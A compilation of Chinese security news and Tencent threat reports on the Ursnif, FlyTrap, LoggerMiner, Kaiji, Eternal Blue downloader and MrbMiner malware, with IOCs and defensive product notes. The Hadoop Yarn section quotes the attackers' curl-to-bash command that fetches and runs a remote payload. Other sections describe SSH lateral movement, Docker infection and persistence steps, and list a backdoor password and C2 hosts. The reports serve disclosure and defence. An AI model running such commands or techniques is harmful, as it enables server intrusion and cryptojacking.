Bleeping Computer 报道称：Ursnif 网银木马的一个新变种（又称 Gozi），正在对粗心的受害者展开基于无害验证码的欺骗攻击，以窃取他们的敏感信息。MalwareHunterTeam 曝光了这款变种木马，可知当试图通过特定 URL 观看嵌入页面的 YouTube 视频时，它会引诱受害者下载一个所谓“console-play.exe”的恶意文件。 恶意网站截图 恶意网站会显示一个虚假的 reCAPTCHA 验证界面，以证明访客是真人而不是机器人。 同时由于这个“播放控制台”是一个可执行文件，浏览器会向用户发出潜在的恶意软件威胁警告。即便如此，毫无戒心的用户还是很容易上钩。 虚假的 reCAPTCHA 人机验证界面 如上图所示，该网站会要求用户依次按下 B、S、Tab、A、F、以及回车键。对于熟悉快捷键操作的熟练计算机用户来说，明显知道 BSAF 这几个字母其实都是幌子。 因为在当前界面下，一旦你按下了 Tab 和回车键，就有可能在不知不觉中将 Ursnif 木马程序给保留下来。此时网页视频也会继续播放，因此具有相当大的迷惑性。 NET Helper 文件夹中的内容 如果下载运行了 console-play.exe，就会在系统 AppData 下的 Roaming 路径，创建一个名为“Bouncy for .NET Helper”的文件夹。 为了混淆视听，恶意软件制作者还特意在“BouncyDotNet.exe”主程序之外，夹杂了大量的诱饵文件。 注册表详情 据悉，BouncyDotNet.exe 会创建有助于 Ursnif 网银木马传播的感染性动态链接库（DLL）文件，以进一步窃取与凭证相关的敏感信息。 但这其实并不是本年度的第一波 Ursnif 恶意软件攻击，因为 Avast 早在 3 月份就指出，这款网银木马已经导致意大利 100 多家银行躺枪。   （消息及封面来源：cnBeta）

安全研究人员发现，自2021年3月以来，一个代号为FlyTrap的新安卓木马已经袭击了至少140个国家，并通过社交媒体劫持、第三方应用商店和侧载应用程序传播给超过10000多名受害者。 Zimperium的zLabs移动威胁研究团队最近使用Zimperium的z9恶意软件引擎和设备上的检测，发现了以前没有被检测到的恶意软件。经过他们的取证调查，zLabs团队确定这个以前未被检测到的恶意软件是一个木马家族的一部分，它采用社会工程的技巧来破坏Facebook账户。 这个活跃的Android木马攻击已经命名为FlyTrap，安全研究人员指出自2021年3月以来，来自越南的黑客团队在运营这个木马活动。这个恶意应用程序最初是通过Google Play和第三方应用程序商店分发的。Zimperium zLabs向Google报告了这些发现，Google核实了所提供的研究，并从Google Play商店删除了相关的恶意应用程序。然而，包含这个木马程序的恶意应用程序仍然可以在第三方不安全的应用程序库中找到，因此突出了侧载应用程序对移动端点和用户数据的风险。 FlyTrap通过感染Android设备的木马程序劫持受害者的Facebook账户，对受害者的社会身份构成威胁。从受害者的Android设备上收集的信息包括Facebook ID、地点、电子邮件地、IP地址、与Facebook账户相关的Cookie和令牌。这些被劫持的Facebook会话可以被用来传播恶意软件，通过带有木马链接的个人信息滥用受害者的社会信誉，以及利用受害者的地理位置信息进行宣传或造谣活动。这些社会工程技术在数字世界中是非常有效的，并经常被网络犯罪分子用来将恶意软件从一个受害者传播到另一个受害者。   （消息及封面来源：cnBeta）

由于采用了合法的非恶意软件的外观，木马开源软件隐蔽且有效的攻击很难被发现。但通过仔细调查可发现其可疑行为，从而暴露其恶意意图。 开源软件如何木马化？我们如何检测到它们？为了回答这些问题，让我们看一下最近的相关调查。 …… 更多内容请至Seebug Paper  阅读全文：https://paper.seebug.org/1429/       消息来源：trendmicro，封面来自网络，译者：小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/RSKXqrIjesBr6qcIOXT5OA   一、概述 腾讯主机安全（云镜）捕获一个新的挖矿木马LoggerMiner，该木马在云上主机中攻击传播，会利用当前主机上的ssh账号信息对其他主机发起攻击，以控制更多系统。并且，LoggerMiner还会尝试对当前主机上的docker容器进行感染。 该木马代码中大量使用了logger字符串作为系统账号名、文件路径、通信域名等。腾讯安全团队据此将其命名为“LoggerMiner”挖矿木马。该木马存在多个模块具备以下恶意行为： 利用ssh爆破感染其他云主机、修改ssh配置，关闭安全设置，留置后门，方便攻击者远程登录；向docker容器发送恶意命令，进行感染；木马的部分攻击代码尚未完工。 木马还会尝试卸载云服务器安全软件、结束竞品挖矿木马进程、停止系统日志、修改系统安全设置，删除其他竞品挖矿木马创建的帐户、添加自己的新帐号，安装定时任务实现持久化等功能。 腾讯安全系列产品应对LoggerMiner挖矿木马的响应清单如下： 应用 场景 安全产品 解决方案 威胁 情报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）LoggerMiner挖矿木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）LoggerMiner挖矿木马相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全防护 云防火墙 （Cloud Firewall，CFW） 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload  Protection，CWP） 已支持检测： LoggerMiner挖矿木马相关文件查杀 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 网络资产风险监测系统 （腾讯御知） 1）关于腾讯T-Sec网络资产风险监测系统的更多信息，可参考：https://s.tencent.com/product/narms/index.html 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）可查杀LoggerMiner挖矿木马相关文件； 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/   二、详细分析 该木马的代码中大量使用了logger字符串作为系统账号名、文件路径、通信域名等，腾讯安全团队据此将其命名为“LoggerMiner“。 LoggerMiner挖矿木马感染主机后会通过cron定时任务实现持久化，从定时任务里可以看到，LoggerMiner挖矿木马会执行3个恶意脚本，我们把这3个脚本定义为3个模块：xanthe、xesa、fczyo，然后逐个分析。 xanthe模块 首先看下xanthe模块，该模块有14个函数，大体功能如下： 具体函数执行步骤如下：   总结起来，xanthe模块大体执行流程如下： xanthe模块首先会检查感染标识文件/tmp/.firstrun-update_ivan1.pid是否存在，如果不存在则进行感染，下载并执行xesa和fczyo模块； 尝试下载挖矿程序java_c、进程隐藏模块libprocesshider.so、以及配置文件config.json并启动java_c挖矿程序； 尝试重新挂载/var/tmp、/tmp目录； 修改ssh配置文件，启用22和33768端口进行连接，允许root账号通过密码登录，允许密钥登录，关闭GSSAPI 认证等； 重启ssh服务； 尝试搜索当前主机的known_hosts、bash_history等配置文件，从里面获取用户名、主机地址、ssh密码/密钥信息，然后利用ssh执行感染模块xanthe。 部分功能代码片段如下： 1.感染判断： 2.利用当前主机上保存的ssh账号信息尝试感染其他机器：   除了以上功能外，该模块代码里有几个函数正在编写中，在此并未启用，从代码上看，该代码功能如下： 尝试搜索当前主机上的known_hosts文件，利用里面保存的ssh登录信息尝试登录并执行恶意代码； 安装masscan后，尝试扫描当前主机上开启2375端口的docker容器，然后利用命令行向容器内部发送恶意命令，实现docker容器感染； 还会尝试下载zgrab扫描器，下载后并未有其他动作，应该是代码没有完成。   相关代码片段如下： 1.利用当前主机上保存的ssh账号信息进行横向感染： 2.利用masscan扫描docker容器，并尝试感染docker容器： 3.下载zgrab扫描器 xesa模块 接下来分析xesa模块，该模块的8个函数功能大致如下： 从以上函数功能可以看出，xesa模块主要负责安全对抗，大致功能总结如下： 卸载阿里云等安全监控服务； 停止系统常用的日志监控服务syslog等； 结束其他挖矿木马进程； 修改系统安全设置等。 部分功能代码片段如下： fczyo模块 最后我们分析下fczyo模块，该模块函数功能大致如下： 从上面函数功能可以看到，该模块功能主要集中在持久化安装方面，大致功能如下： 通过cron安装定时任务，实现恶意代码执行； 通过/etc/rc.d/rc.local 实现开机自启动，实现恶意代码执行； 修改防火墙策略； 修改ssh配置文件，添加ssh密钥，实现免密码登录：         /opt/autoupdater/.ssh/authorized_keys         /opt/system/.ssh/authorized_keys         /opt/logger/.ssh/authorized_keys 添加后门账号，删除其他挖矿木马的后门账号： 添加的账号列表：sysall、system、logger、autoupdater；  删除的账号列表：darmok、cokkokotre1、akay、o、phishl00t、opsecx12   部分功能代码片段如下： 1.修改防火墙配置 2.ssh配置文件修改 3.系统账号添加及修改 IOCs URL hxxp://34.92.166.158:8080/files/xanthe hxxp://34.92.166.158:8080/files/fczyo hxxp://34.92.166.158:8080/files/xesa.txt hxxp://34.92.166.158:8080/files/java_c hxxp://34.92.166.158:8080/files/config.json hxxp://34.92.166.158:8080/files/libprocesshider.so hxxp://139.162.124.27:8080/files/xanthe hxxp://139.162.124.27:8080/files/fczyo hxxp://139.162.124.27:8080/files/xesa.txt hxxp://139.162.124.27:8080/files/java_c hxxp://139.162.124.27:8080/files/config.json hxxp://139.162.124.27:8080/files/libprocesshider.so hxxps://iplogger.org/11sxm hxxps://iplogger.org/17Cph7   Domain iplogger.org   IP 34.92.166.158 139.162.124.27   MD5 776227b07b2f1b82ffcc3aa38c3fae09 70b3ad8f1ce58203c18b322b1d00dd9a 7309b0f891a0487b4762d67fe44be94a 7633912d6e1b62292189b756e895cdae 025685efeb19a7ad403f15126e7ffb5a 83acf5a32d84330bbb0103f2169e10bb   钱包地址 47TmDBB14HuY7xw55RqU27EfYyzfQGp6qKmfg6f445eihemFMn3xPhs8e1qM726pVj6XKtyQ1zqC24kqtv8fXkPZ7bvgSPU   47E4c2oGb92V2pzMZAivmNT2MJXVBj4TCJHad4QFs2KRjFhQ44Q81DPAjPCVc1KwoKQEp1YHdRMjGLUe6YdHPx5WEvAha1u   ssh密钥 AAAAB3NzaC1yc2EAAAADAQABAAABAQDLVZNrAJ1uzR7d2bm1iUQPAgjuBlyLQQNaEHVmACWtGwwiOKMPiFBfBjuNJIyZFnGkkF gJP5fi8v1eqliaBgqERUDDtW/RZDDIz8DovDrA4/MGlxpCHLeViN+F62W/jgeufiQ7NiPTlPB3Fuh7E7QXXpXqQ6EmVlV0iWdzqRvSiDIB3 cIL6E2CrK47pY6Rp6rY2YKYzUhiZRqAMHViMR+2MARL2jERfF3CsG6ZXo/7UVVx+tqoKQDHPmz21mrulOF6RW5hh04dE2q1+/w6xm X8AxUSGmPdpwQa8GuV7NHHZmYO26ndTVi2ES472tJdkXVHmLX8B9Un42JLNVXwPU/Hlinux@linux.com

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/hacyPAA82rgEBivwOYhuEg   一、概述 腾讯安全威胁情报中心在为客户提供安全巡检服务时，发现腾讯主机安全（云镜）告警SSH爆破入侵事件，遂对事件进行溯源追查，溯源到有疑似国内黑客开发的木马Kaiji通过22端口弱口令爆破入侵服务器。攻击者入侵云主机会下载二进制木马将自身安装到系统启动项进行持久化，并且可根据C2服务器返回的指令进行DDoS攻击。由于响应及时，客户未遭受损失。 腾讯威胁情报中心建议企业用户检查Linux服务器上是否存在以下文件，若存在，建议删除木马文件并将SSH的登陆口令设置为强密码。 /usr/lib/8uc_bt /usr/8uc_bt /boot/8uc_bt /root/8uc_bt.1 /root/8uc_bt /dev/8uc_bt /8uc_bt   腾讯安全系列产品针对Kaiji木马最新变种的响应清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）Kaiji木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）Kaiji木马相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1)Kaiji木马关联的IOCs已支持识别检测； 2)检测SSH弱口令爆破攻击； 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1)已支持查杀kaiji木马程序； 2)支持检测SSH弱口令爆破攻击； 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1)已支持通过协议检测kaiji木马与服务器的网络通信； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）可查杀kaiji木马程序； 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 二、详细分析 SSH是 Secure Shell的缩写，由IETF的网络小组（Network Working Group）所制定；SSH为建立在应用层基础上的安全协议。SSH是目前较可靠，专为远程登录会话和其他网络服务提供安全性的协议。云上服务器使用SSH服务的占比较高，而部分用户往往又未对其采取安全的配置，使得SSH监听在默认的22端口且不具备高强度密码、甚至使用空口令，导致黑客可轻易针对服务器22端口进行爆破入侵。Kaiji以root用户为目标，通过SSH暴力破解进行攻击传播。Kaiji通过根用户登陆，可以实现某些自定义网络数据包的DDoS攻击（在Linux中，自定义网络数据包仅提供给特权用户）。建立SSH连接后，会执行bash脚本，下载二进制木马文件8uc_bt并执行。 8uc_bt采用golang编写，执行后会通过修改系统初始化脚本init.d将恶意代码添加到启动项。 然后解密内置的C2服务器地址。     进入Main_doTask循环代码，从C2：a.kaiqingd.com:2323获取命令并执行。 执行的命令包括： DDoS指令； SSH暴力破解指令； 运行shell命令； 替换C2服务器； 删除自身和所有持久化任务。 其中DDoS 攻击类型包括： tcpflood udpflood getflood tapflood tcpddosag synddos 部分执行命令的函数名如下： main_runkshell：通过rc.d和Systemd服务安装持久性； main_runghost：通过/etc/profile.d（/etc/profile.d/linux.sh）安装持久化任务； main_rundingshi（汉字拼音：运行定时）：通过crontab安装持久化任务； main_runshouhu（汉字拼音：运行守护）：调用rootkit，将rootkit复制到/etc/32679并每30秒运行一次； main_Getjiechi、main_Jiechixieru、main_Jiechigo（汉字拼音：劫持写入）：通过劫持系统程序启动木马。 其中“dingshi”、“shouhu”、“jiechi”等汉语拼音字符显示该木马作者疑似来自国内。   IOC Md5 348e35db572ad76271220280c5a64190   C&C a.kaiqingd.com:2323   IP 113.200.151.118 (ZoomEye搜索结果）   参考链接： https://securityaffairs.co/wordpress/102753/malware/kaiji-linux-iot-malware.html https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/953ZHaf8IjLGyxB3tWSoDQ 一、概述 腾讯安全威胁情报中心检测到永恒之蓝下载器木马新增利用Hadoop Yarn未授权访问漏洞攻击。该变种入侵Linux服务器后下载门罗币挖矿木马，然后将挖矿任务进行持久化、清除竞品挖矿木马，并通过SSH爆破横向移动。 永恒之蓝下载器木马自2018年底出现以来，一直处于活跃状态。该病毒不断变化和更新攻击手法，从最初只针对Windows系统扩大攻击范围到Linux系统。截止目前，其攻击手法已涵盖弱口令爆破、系统漏洞利用、Web漏洞利用等，其中利用SSH、Redis、Hadoop Yarn服务的攻击方式可能对云主机以及云上业务造成较大威胁。其主要入侵方式列表如下： 腾讯安全系列产品针对永恒之蓝下载器木马最新变种的响应清单如下 ： 应用场景 安全产品 解决方案 威胁情报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）永恒之蓝漏洞MS17-010; 2）SMBGhost漏洞CVE-2020-0796; 3）Redis未授权访问漏洞; 4）Hadoop Yarn未授权访问漏洞   有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 已支持检测： 1）永恒之蓝漏洞MS17-010; 2）SMBGhost漏洞CVE-2020-0796; 3）Redis未授权访问漏洞; 4）Hadoop Yarn未授权访问漏洞   腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 网络资产风险监测系统 （腾讯御知） 1）腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2）已集成无损检测POC，企业可以对自身资产进行远程检测。 关于腾讯T-Sec网络资产风险监测系统的更多信息，可参考：https://s.tencent.com/product/narms/index.html 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持检测： 1）永恒之蓝漏洞MS17-010; 2）SMBGhost漏洞CVE-2020-0796; 3）Redis未授权访问漏洞; 4）Hadoop Yarn未授权访问漏洞   关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序； 2）已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3）已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序；   腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 二、详细分析 Hadoop是一个由Apache基金会所开发的分布式系统基础架构，YARN是hadoop系统上的资源统一管理平台，其主要作用是实现集群资源的统一管理和调度，可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上，通过YARN来管理资源。用户可以向YARN提交特定应用程序进行执行，其中就允许执行相关包含系统命令。 YARN提供有默认开放在8088和8090的REST API（默认前者）允许用户直接通过API进行相关的应用创建、任务提交执行等操作，如果配置不当，REST API将会开放在公网导致未授权访问的问题，攻击者可以在未授权的情况下远程执行代码。 永恒之蓝下载器木马变种在yarnexec()函数中对yarn未授权访问漏洞进行利用。 攻击成功后执行远程命令： export src=yarn;curl -fsSL t.amynx.com/ln/core.png?yarn|bash core.png首先下载门罗币挖矿木马d.ackng.com/ln/xr.zip并启动挖矿进程/.Xll/xr，然后添加crontab定时任务将挖矿作业持久化。 清除竞品挖矿木马： 利用SSH爆破进行横向移动： 永恒之蓝下载器木马历次版本更新情况如下：  IOCs URL http[:]//d.ackng.com/ln/xr.zip http[:]//t.amynx.com/ln/core.png http[:]//t.amynx.com/ln/a.asp http[:]//t.jdjdcjq.top/ln/a.asp MD5 if.bin 888dc1ca4b18a3d424498244acf81f7d a.jsp(powershell) c21caa84b327262f2cbcc12bbb510d15 kr.bin e04acec7ab98362d87d1c53d84fc4b03 core.png e49367b9e942cf2b891f60e53083c938 a.jsp(shell) b204ead0dcc9ca1053a1f26628725850 gim.jsp b6f0e01c9e2676333490a750e58d4464 矿池： lplp.ackng.com:444 参考链接： 1. Hadoop Yarn REST API未授权漏洞利用挖矿分析 https://www.freebuf.com/vuls/173638.html 2. 关于Apache Hadoop Yarn资源管理系统REST API未授权漏洞通知 https://bbs.qcloud.com/thread-50090-1-1.html 3. 永恒之蓝下载器最新变种重启EXE文件攻击，新变种已感染1.5万台服务器 https://s.tencent.com/research/report/1038.html 4.https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py （封面来自网络）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/oq3z6rUcPfmMi0-KHQ3wwQ 一、背景 腾讯安全威胁情报中心检测到新型挖矿木马家族MrbMiner，黑客通过SQL Server服务器弱口令爆破入侵，爆破成功后在目标系统释放C#语言编写的木马assm.exe，进一步通过该木马与C2服务器通信，然后下载门罗币挖矿木马并维持挖矿进程。挖矿木马文件通过ZIP解压缩得到，并且会伪装成各类Windows系统服务。由于该挖矿木马的C2地址、矿池账号和文件信息均包含特征字符“MRB”，腾讯安全威胁情报中心将其命名为“MrbMiner“。 MrbMiner入侵后会释放另外两个下载器installerservice.exe、PowerShellInstaller.exe，下载器会将挖矿木马安装为系统服务以实现持久化运行，同时会搜集中招系统信息（包括CPU型号、CPU数量、.NET版本信息），关闭Windows升级服务以及在Windows系统中添加后门账号以方便继续入侵控制。 MrbMiner挖矿木马会小心隐藏自身，避免被管理员发现。木马会监测任务管理器进程，当用户启动“任务管理器”进程查看系统时，挖矿进程会立刻退出，并删除相关文件。 腾讯安全专家在MrbMiner挖矿木马的FTP服务器上还发现了基于Linux系统和ARM系统的挖矿木马文件，推测MrbMiner已具备跨平台攻击能力。根据目前掌握的威胁情报数据，MrbMiner挖矿木马已控制上千台服务器组网挖矿。 腾讯安全系列产品已支持检测、清除MrbMiner挖矿木马，详细响应清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）MrbMiner挖矿木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）MrbMiner挖矿木马相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）MrbMiner挖矿木马关联的IOCs已支持识别检测； 2）SQL Server弱口令爆破登陆预警。 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀MrbMiner相关木马程序； 2）SQL Server弱口令爆破登陆预警。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测MrbMiner挖矿木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）可查杀MrbMiner入侵释放的木马程序。 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/ 二、详细分析 黑客通过批量扫描和爆破SQL Server服务，执行shellcode下载assm.exe到服务器一下位置，并启动assm.exe： c:/program files/microsoft sql server/mssql**.mssqlserver/mssql/data/sqlmanagement/assm.exe c:/windows/temp/sqlmanagement/assm.exe assm.exe采用C#编写，执行后首先杀死已有挖矿进程，并删除文件。 然后向服务器vihansoft.ir:3341发送上线信息“    StartProgram    ok”。 从服务器mrbfile[.]xyz下载门罗币挖矿木马压缩包文件sqlServer.dll。 对下载得到的文件进行Zip解压缩。 挖矿木马文件名伪装成与Windows正常服务相似的文件名： Microsoft Media Service.exe Microsoft Agent System.exe WindowsSecurityService.exe WindowsAgentService.exe WindowsHostService.exe Windows Desktop Service.exe Windows Host Management.exe Windows Update Service.exe SecurityService.exe InstallWindowsHost.exe SystemManagement.exe 文件描述也使用类似的伪装手法： Services Service-Mrb WindowsSecurityService MrbMngService SetAllconfig()设置挖矿配置文件，首先向服务器发送消息“getConfig”获取配置文件，然后将得到的配置文件中的“rig-id”由“MRB_ADMIN”替换为“MrbAdmin-ProcessorCount”，ProcessorCount为当前机器CPU数量。 同时根据环境下不同的CPU数量设置不同的挖矿端口，默认端口为3333： CPU：1，port:3331 CPU：2，port:3332 CPU：4，port:3334 CPU：8，port:3338 默认挖矿配置参数： 一旦检测到挖矿进程退出，则重新启动。 一旦检测到“taskmgr”进程存在，则退出挖矿进程，并删除相关文件。（非常狡猾的设计，如果用户发现系统异常，准备打开任务管理器检查时，挖矿进程就结束，并删除文件） 私有矿池：mrbpool.xyz:443 公有矿池：pool.supportxmr.com:3333 门罗币钱包： 49Bmp3SfddJRRGNW7GhHyAA2JgcYmZ4EGEix6p3eMNFCd15P2VsK9BHWcZWUNYF3nhf17MoRTRK4j5b7FUMA9zanSn9D3Nk 目前该钱包的收益为7个XMR，其私有矿池收益无法查询，而挖矿木马收益主要来源于私有矿池，因此该挖矿木马的实际收益会远远超过当前数额。 分析发现，黑客入侵后释放的另外两个下载器installerservice.exe、PowerShellInstaller.exe，下载门罗币挖矿木马之后，还会将其安装服务进行持久化，服务名为”Microsoft Agent Service”、”Windows Host Service”。 添加Windows账号”Default”，密码：”@fg125kjnhn987″，以便后续入侵系统。 执行Powershell命令，关闭系统升级服务： 获取系统内存信息： 获取IP地址： 获取CPU名称： 获取CPU数量： 获取.NET Framework版本信息： 此外，腾讯安全专家在攻击者的FTP服务器ftp[:]//145.239.225.15上，还发现了基于Linux平台和ARM平台的挖矿木马： Linux和ARM平台挖矿使用矿池：pool.supportxmr.com:80 钱包： 498s2XeKWYSEhQHGxdMULWdrpaKvSkDsq4855mCuksNL6ez2dk4mMQm8epbr9xvn5LgLPzD5uL9EGeRqWUdEZha1HmZqcyh 该钱包目前收益3.38个XMR。 IOCs IP 145.239.225.15 145.239.225.18 Domain mrbfile.xyz vihansoft.ir C&C vihansoft.ir:3341 URL http[:]//mrbfile.xyz/Hostz.zip http[:]//mrbfile.xyz/PowerShellInstaller.exe http[:]//mrbfile.xyz/sql/SqlServer.dll http[:]//mrbfile.xyz/Agentz.zip http[:]//mrbfile.xyz/Agenty.zip http[:]//mrbfile.xyz/sql/syslib.dll http[:]//mrbfile.xyz/sys.dll http[:]//mrbfile.xyz/35/sys.dll http[:]//mrbfile.xyz/Hosty.zip http[:]//vihansoft.ir/sys.dll https[:]//vihansoft.ir/Sys.dll http[:]//vihansoft.ir/Agentx.zip https[:]//vihansoft.ir/d.zip http[:]//vihansoft.ir/k.exe http[:]//vihansoft.ir/d.zip https[:]//vihansoft.ir/Hostx.zip http[:]//vihansoft.ir/p.zip https[:]//vihansoft.ir/k.exe https[:]//vihansoft.ir/Agentx.zip https[:]//vihansoft.ir/vhost.tar.gz https[:]//vihansoft.ir/P.zip https[:]//github.com/farzadbehdad/poiuytrewq/blob/master/Sys.dll?raw=true https[:]//vihanSoft.ir/Agent.zip https[:]//vihanSoft.ir/host.zip ftp[:]//145.239.225.15/armv.tar.gz ftp[:]//145.239.225.15/linux-os.tar.gz ftp[:]//145.239.225.15/linuxservice.tar.gz ftp[:]//145.239.225.15/osx.tar.gz ftp[:]//145.239.225.15/vhost.tar.gz ftp[:]//145.239.225.15/xmr.tar.gz ftp[:]//145.239.225.15/arm.tar.gz Md5 c79d08c7a122f208edefdc3bea807d64 6bcc710ba30f233000dcf6e0df2b4e91 ac72e18ad3d55592340d7b6c90732a2e 6c929565185c42e2e635a09e7e18fcc8 04612ddd71bb11069dd804048ef63ebf 68206d23f963e61814e9a0bd18a6ceaa a5adecd40a98d67027af348b1eee4c45 c417197bcd1de05c8f6fcdbfeb6028eb 76c266d1b1406e8a5e45cfe279d5da6a 605b858b0b16d4952b2a24af3f9e8c8e c3b16228717983e1548570848d51a23b c10b1c31cf7f1fcf1aa7c79a5529381c 391694fe38d9fb229e158d2731c8ad7c 5d457156ea13de71c4eca7c46207890d f1cd388489270031e659c89233f78ce9 54b14b1aa92f8c7e33a1fa75dc9ba63d f9e91a21d4f400957a8ae7776954bd17 61a17390c68ec9e745339c1287206fdb f13540e6e874b759cc3b51b531149003 2915f1f58ea658172472b011667053df 3cb03c04a402a57ef7bb61c899577ba4 f2d0b646b96cba582d53b788a32f6db2 